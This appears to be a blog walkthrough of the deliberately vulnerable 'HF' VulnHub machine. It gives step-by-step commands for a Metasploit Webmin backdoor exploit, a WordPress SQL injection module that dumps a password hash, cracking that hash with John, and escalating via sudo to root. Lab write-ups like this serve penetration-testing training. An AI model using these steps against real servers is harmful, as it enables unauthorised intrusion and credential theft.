Hack Fest

The machine was part of my workshop for Hacker Fest 2019 at Prague. Difficulty level of this VM is very “very easy”. There are two paths for exploit it. There are no intentional rabbit holes. There is a “[retracted]” injection (exploit is part of MSF). Recovered credentials (username + hash) can be cracked by John and rockyou.txt wordlist. Low priv shell can be gained through MSF exploit or trying the credentials against “[retracted]”. Priv. esc. is simply done by “[retracted]”.

Url: HF VulnHub

Difficulty: Easy

Author: Martin Haller

Enumeration

Firstly, a netdiscover scan will reveal how the machine can be identified on the network:

netdiscover -i eth1

netdiscover

Then an nmap scan:

nmap -p- -A 192.168.56.112

nmap

FTP

The port scan reveals ports 21 (ftp), 22 (ssh) and 10000 which seems to be hosting Webmin. I will attempt to connect via FTP via Anonymous. This was an extremely easy way to gain access to all the wordpress websites files, however I will be exploring other methods which require more exploitation.

ftp

Some simple enumeration and an understanding of back end web apps will get you the right information.

Webmin

Some research shows a Webmin 1.920 vulnerability. I use searchsploit to find these vulnerabilities. I am particularly interested in the Unauthenticated Remote Code Execution.

ss

On metasploit console, we use the webmin exploit and fill out the necessary options as demonstrated below:

msfconsole
use exploit/linux/http/webmin_backdoor
show options
set rhosts 192.168.56.112
set ssl true
set lhost 192.168.56.101

msf

The exploit is ready to go.

exploit
id

root

Root access.

Wordpress

Another attack vector is the Wordpress site on port 80.

wordpress

WPScan will be used to find any vulnerabilities and possible users on the website. Please note that you use a WPScan API Token from here to view the vulnerable data.

wpscan --url http://192.168.56.112/ -e vp,u

wpscan

After some research, the Unauthenticated SQL Injection vulnerability seems like the best route to go down. There is a Metasploit module for this.

Something else to note is the username ‘webmaster’ found on the Wordpress site.

msfconsole
use auxiliary/admin/http/wp_google_maps_sqli
show options
set RHOSTS 192.168.56.112

msfwp

The exploit has been correctly set up. Run the exploit.

exploit

exploit

A hash value has been returned with the correct username that was found before on the WPScan results.

 192.168.56.112:80 - Found webmaster $P$BsqOdiLTcye6AS1ofreys4GzRlRvSr1 [email protected] 

Let’s ask our friend John to crack it. Use rockyou.txt as the wordlist.

echo "$P$BsqOdiLTcye6AS1ofreys4GzRlRvSr1" > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

john

The password “kittykat1” has been returned.

Let’s try connect via ssh:

ssh [email protected]
kittykat1

ssh

We are logged in as webmaster. Check the sudo privileges with the following command:

sudo -l

This user is basically already root so let’s just change to root shell with the following:

sudo -i

And we are root.

root

Written on May 3, 2020